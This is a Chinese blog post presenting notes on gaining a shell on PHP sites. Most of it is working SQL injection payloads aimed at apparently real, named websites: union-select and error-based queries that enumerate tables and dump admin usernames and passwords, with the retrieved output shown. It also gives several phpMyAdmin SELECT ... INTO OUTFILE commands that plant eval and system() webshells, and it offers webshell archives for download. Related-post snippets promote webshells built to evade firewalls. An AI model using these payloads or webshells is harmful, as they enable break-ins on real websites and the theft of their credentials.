php渗透上传一句话,【渗透】PHP拿shell的经验总结(附带大马一句话马)

最新推荐文章于 2022-04-08 00:03:09 发布
最新推荐文章于 2022-04-08 00:03:09 发布
阅读量317 收藏
点赞数
文章标签: php渗透上传一句话

手工注入笔记↓

一.

检测字段长度

http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错  说明字段长度是24

查看数据库信息

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

user() ----------osywine@115.160.154.39

version()--------5.0.91-log   版本

5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.

database()-------osywine

二.

利用虚拟库information_schema 报表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

0x6F737977696E65 是osywine 16进制     0x6F737977696E6520

在添加limit+0,1 limit+1,1 limit+0,1 查询下一个

爆出admin这张表

三.

利用表爆字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

爆出id

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1

爆出username

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1

爆出password

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

直接爆用户密码

**********************************************************************************

第二种方法(比较方便,速度)

一次性报爆表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65

0x6F737977696E65   是16进制的osywine

所有的表如下:

aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

接下来就是最后一步。。。用户名和密码直接暴出。。。。

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

注:这里面所有的+号是代替空格的,还可以用/**/来代替,不同情况,不同分析!

快速暴表

and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=0x636164657475725F6361646532303036 (当前库的十六进制)

http://www.cadeturcr.com/nuevo/pags/detalle_oferta.php?id=600 and 1=2 union select 1,2,group_concat(table_name),database(),user(),6,7,8,9 from information_schema.tables where table_schema=0x636164657475725F6361646532303036

快速暴字段

and 1=2 union select group_concat(column_name) from information_schema.columns where table_name=表

双暴字段内容(0x3a 是:的意思)

and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5 from 表 这个表不用十六进制

爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

爆当前数据库

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

爆表

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=hex库名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

爆字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=库名 and table_name=表名 limit 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

爆内容

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,表名.字段,0x27,0x7e) from 表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

一次性爆出所有字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

0x61646D696E 是admin的16进制

所有字段如下;

id,username,password

大马+一句话(PHP).rar

类型:

售价:0

大小:12KB

下载:0次

描述:

大马+一句话(ASP).rar

类型:

售价:0

大小:102KB

下载:0次

描述:

phpadmin拿Shell

root 密码第一种

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');

SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';DROP TABLE IF EXISTS `darkmoon`;

第二种方法

Create TABLE moon (darkmoon text NOT NULL);Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');

select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';Drop TABLE IF EXISTS moon;

第三种方法:

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/darkmoon3.php'

第四种方法select '<?php echo \'

\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'

127.0.0.1/darkmoon4.php?cmd=net user

php暴路径的所有1、单引号爆路径

说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。

[url]www.xxx.com/news.php?id=149

Kang He
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ueditor getshell漏洞重现及分析
weixin_30681121的博客
12-07 1272
0x00 概述 8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
phpmyadmin Getshell 思路
ITgougou_的博客
11-14 447
前几天遇到一个phpmyadmin,可惜在网上也没找到绝对路径,也就没办法上传getshell,这里梳理一下phpmyadmin getshell思路。 这里getshell必须要知道网站的绝对路径,这也是信息收集的重要部分 前提:php爆绝对路径 单引号爆路径 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=1′ 错误参数值爆路径 将要提交的参数值改成错误值,比如-1。-99999单引号被.
admin密码对应的MD5值,16位和32位,admin解密自己留着方便.
diaofuzuo3286的博客
01-08 1181
admin密码对应的MD5值,16位和32位,自己留着方便.admin的md5值是多少,常用密码加密md5值,123456,admin,admin888 如果遇到MD5加密文件(一般都是这个),而又不知道密码的, 请用这组加密的数据7a57a5a743894a0e替换即可,那么密码就是:admin,这个是16位的 32位的是:21232f297a57a5a743894a0...
R57 – 截获一只国内罕见的WebShell大马
01-21
截获一只国内罕见的WebShell大马 工具默认语言为Indonesian(印度尼西亚语),提供一般工具都特有的数据库接口,在线的文件管理,管道命令的执行,还支持伪装E-Mail发送,Wget下载,还有一些我也没用过的东西= =..凭着多年玩的直觉,目测这货不是吃素的货
php一句话cmdshell新型 (非一句话)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
BestShell:世界上最好用的php大马
03-09
请勿用作非法用途! 具体介绍: ://yzddmr6.tk/2019/09/01/BestShell/ 代码开源排除后门,免杀自己做。 4.0更新日志 修复php7.0之后将不再支持与类名相同...去除大马标题,防止谷歌黑客找 从其他大马里移植了顶部函数
2017php免杀大马 过狗
02-19
才卖一个资源分了,密码123123
ASP大马网站渗透测试
01-15
 第一项显示:服务器iis版本、服务器超时时间、以及session信息、服务器CPU数量、主机名、默认管理员信息、Terminal Service终端端口(需要wscript.shell组件支持)支持脚本探测(aspx,php,pl)功能,支持bing查询...
探索基于.NET下实现一句话之asmx篇1
08-03
总结来说,本文介绍了如何利用.NET的ASMX特性创建一句话。通过理解ASMX的工作原理,结合Web服务的方法和属性,我们可以构造出能够接受远程指令并执行的恶意服务。然而,这种行为必须在合法的安全研究范围内进行...
PHP大马
12-24
php的分析(加密破解) - 分析可以知道,此木经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,
phpmyadmin新姿势getshell
Au
11-03 6572
百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HT...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话带404页面,带MD5加密,可浏览器POST任意php代码执行.
phpmyadmin上传Webshell总结
afei001
08-31 510
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
phpmyadmin拿网站shell
J_joker_的博客
11-16 843
时间:2018-11-15 ID:joker_vip(CSDN)     这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。     这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图...
MSF模拟渗透测试之一句话shell
lza20001103的博客
04-08 3813
MSF模拟渗透测试之一句话shell
过宝塔php大马,分享宝塔网站防火墙使用帮助
weixin_39757122的博客
03-20 887
下面由宝塔面板教程栏目给大家分享宝塔网站防火墙使用帮助,希望对需要的朋友有所帮助!推荐教程:《宝塔面板》Nginx防火墙建议使用Nginx 1.18 及其以上版本。兼容性更佳如果是小于1.18的版本 编译安装的兼容性也是OK的。建议低版本的Nginx 更新至Nginx1.18 或者Nginx 1.19简介:一直都有用户建议我们开发木扫描,木清理模块,但我们认为与其亡羊补牢,不如直接在源头上阻...
dvwa小上传大马php,集训第六天:文件上传漏洞
weixin_39981681的博客
04-04 242
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力木根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木;根据作用分类,有大马和小PHP一句话:ASP一句话:ASP.NET一句话shell_exec...
php一句话图片
最新发布
01-30
下面是一个示例,展示了如何在PHP一句话中使用图片的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $result = shell_exec($cmd); // 将结果输出到图片文件 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值